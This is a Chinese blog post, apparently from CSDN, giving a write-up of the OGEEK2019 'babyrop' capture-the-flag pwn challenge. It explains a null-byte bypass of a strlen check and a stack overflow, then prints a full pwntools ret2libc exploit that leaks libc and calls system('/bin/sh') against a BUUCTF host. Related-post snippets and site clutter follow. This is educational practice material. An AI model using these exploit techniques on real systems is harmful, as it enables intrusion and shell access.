OGEEK2019 babyrop wp

最新推荐文章于 2021-12-04 11:01:26 发布
最新推荐文章于 2021-12-04 11:01:26 发布
阅读量2.2k 收藏
点赞数
分类专栏: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43409582/article/details/104963012
版权
pwn 同时被 2 个专栏收录
15 篇文章 1 订阅
订阅专栏
ctf
12 篇文章 0 订阅
订阅专栏

这题就是需要绕过两个验证,之后就是常规rop了。
在这里插入图片描述这里有个比较,你输入的值与一个随机数进行比较,这个验证不过会直接推出程序。那我们就让他取一个极值,让他无论是何值都能过。因为strlen这个函数遇到’\0’就会截止。所以我们就输入‘\x00’就好了。这样不论随机数是什么我们都会取<0。
在这里插入图片描述
这个地方的取值是之前那个函数的返回值,利用之前那个输入的地方把v5盖成一个很大的值以便之后做栈溢出的rop。
在这里插入图片描述

exp

:

from pwn import *
context.log_level = 'debug'
context.terminal = ['terminator', '-x' , 'sh' , '-c']
local = 0 
if local:
    p = process('./pwn')
    elf = ELF('./pwn')
    libc = ELF("./libc-2.23.so")
else:
    p = remote("node3.buuoj.cn",28060)
s = lambda a: p.send(str(a))
sa = lambda a, b: p.sendafter(str(a), str(b))
st = lambda a, b: p.sendthen(str(a), str(b))
sl = lambda a: p.sendline(str(a))
sla = lambda a, b: p.sendlineafter(str(a), str(b))
slt = lambda a, b: p.sendlinethen(str(a), str(b))
r = lambda a=4096: p.recv(a)
rl = lambda: p.recvline()
ru = lambda a: p.recvuntil(str(a))
irt = lambda: p.interactive()
write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x08048825
pay = "\x00" + "\xff"*7
sl(pay)
ru("Correct\n")
pay2 = "a"*0xE7 + p32(0) + p32(write_plt) + p32(main) 
pay2 += p32(1) + p32(write_got) + p32(4)
sl(pay2)
libcbase = u32(p.recv(4)) - libc.symbols['write']
log.success("libcbase: 0x%x" % libcbase)
bin_sh = libc.search('/bin/sh').next() + libcbase
sys_addr = libcbase + libc.symbols['system']
log.success("sys_addr : 0x%x" % sys_addr)
log.success("bin_sh : 0x%x" % bin_sh)


sl(pay)
ru('Correct\n')
pay3 = "a"*0xe7 + p32(0)
pay3 += p32(sys_addr) + "aaaa" + p32(bin_sh)
sl(pay3)


p.interactive()

不知道为啥打远程打不通,,,
在这里插入图片描述这是报错…哪个路过的大佬可以说一下哪里出问题了吗< - _ - >

ch3nwr1d
关注
专栏目录
w3wp.exe 中发生未处理的 Microsoft ,NETFramework 异常。
**My Coding Family**
07-06 1278
ok,以上就是我这期的Bug修复内容啦,如果还想查找更多解决方案,你可以看看我专门收集Bug及提供解决方案的专栏「Bug调优」,都是实战中碰到的Bug,希望对你有所帮助。到此,咱们下期拜拜。码字不易,如果这篇文章对你有所帮助,帮忙给bug菌来个,您的支持就是我坚持写作分享知识点传播技术的最大动力。「猿圈奇妙屋」;以第一手学习bug菌的首发干货,不仅能学习更多技术硬货,还可白嫖最新BAT大厂面试真题、4000G Pdf技术书籍、万份简历/PPT模板、技术文章Markdown文档等海量资料,你想要的我都有。
2019年长安杯 第一届电子数据取证竞赛 wp
ShenZ的博客
11-14 2694
检材2 检材四
[OGeek2019]babyrop
迷风小白
02-09 1221
[OGeek2019]babyrop 查看程序的保护机制 发现是got表不可写的32位程序 拖进ida查看伪代码 sub_80486BB是初始化缓存区的函数 发现buf是一个随机数 发现函数中存在strncmp比较函数,其中buf为用户输入的值,&s为buf随机数,如果不相等则会退出程序,所以需要想办法绕过这个判断,所以v1的值必须为0 v1 = strlen(buf),strlen这个函数有个缺陷:遇到\x00直接截断。所以我们要输入第一位数为\x00 buf是一个7位数的数组,但函数中
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 4110
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 499
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
OGeek_2019_Final OVM题解
lifanxin的博客
05-24 798
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本题目是一道典型的虚拟机题目,通过这道题目,我们可以学习一下VM pwn题的分析技巧和利用思路。   该题目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机的pwn题,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
[强网杯 2019]Upload wp
qq_41891666的博客
07-16 1621
0x00 前言 本来是在刷 文件上传的题,然后没想到强网杯这个题打着upload 的幌子其实是个反序列化题,看了看wp 后,觉得很有意思,值得记录一下 0x01 题解 1.首先用户登录后的 cookie 是一串加密的内容,很可疑,base64 解密之后,发现是序列化的内容 2.dirmap 扫目录,扫到源码,/www.tar.gz 下载之后发现里面包含源码,以及.idea 文件,phpstorm 打开发现断点,估计是出题人故意留的提示 3.审计源码 先看两个断点处: login_check() 函数
BUUCTF Crypto [NCTF2019]childRSA wp
hsqGOD's blog
03-16 3068
这一道RSA打开加密算法乍一看感觉没有问题,N特别大,除了p和q的生成算法啥都没给,于是我们去查了一下 Crypto.Util.number 中的sieve_base,发现这是前10000个素数的生成列表,我们再去查一下第10000个素数的值为104729 不过就算我们知道了这个值的大小似乎还是得不到结果,从这个p,q的生成算法中,我们可以知道其是由小于104729的素数随机组合生成的,在这里我...
ogeek babyrop
awxnutpgs545144602的博客
09-22 501
拖入ida 先用strncmp使一个随机数与输入比对,这里可以用\x00跳过strncmp 然后read()中的a1是我们输入\x00后的值 写exp from pwn import * sh=remote('node1.buuoj.cn',28560) #sh=process('/home/harmonica/Desktop/opp...
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 440
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
2020-11-11
weixin_52232741的博客
11-11 193
Python文件操作函数 1.Read()函数 函数说明 Read from stream. 函数语法 read(size=-1, /),返回值为str f.read() #全部读取 f.read(100) #读取100个字符 2.Readline()函数 函数说明 Read from stream until newline or EOF. 函数语法 readline(size=-1, /),返回值为str f.readline() #读取一行数据 3. Write()函数 函数说明 Write
OGeek2019_babyrop
z1r0的博客
12-04 306
OGeek2019_babyrop 查看保护 取了一个随机数,接着跟进一下804871f 匹配用户输入的是否与随机数相等。这里使用\x00来绕过,返回了一个v5,v5没有给值,我们再接着往下看 这个函数内a1超过0xE7就会溢出过ebp,所以我们让a1为0xff,就可以溢出很长的空间,这里的a1也就是上面的v5,所以我们肯定要控制v5,看一下v5和buf的关系 804871f这个函数内可以让buf输入0x20个字符,v5和buf距离为7,这样我们就可以控制v5了。接下来rop就好了 from pw
【Writeup】BUUCTF_Pwn_[OGeek2019]babyrop
BAKUMANSEC - Just Do It
09-03 2703
0x01 解题思路 文件基本信息 IDA查看   读取一个随机数,然后与用户输入作比较,需要绕过。strlen遇到**\x00会停止,因此只要开头为\x00,最终比较的长度v1就是0,从而绕过strncmp。   这里read的第三个读取长度参数实际上是前一个函数的返回值,可以通过上一次输入覆盖为\xff**,然后就可以利用栈溢出进行常规ROP了。 0x02 EXP #!/usr/...
WP7程序开发入门指南
"wp7程序开发指南" 该资源是一本针对Windows Phone 7 (简称WP7)应用开发的入门指南,由Microsoft Press出版,适合初学者使用。由于市场上专门针对WP7开发的书籍较为稀缺,因此这本书显得尤为珍贵。书中内容涵盖了WP...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值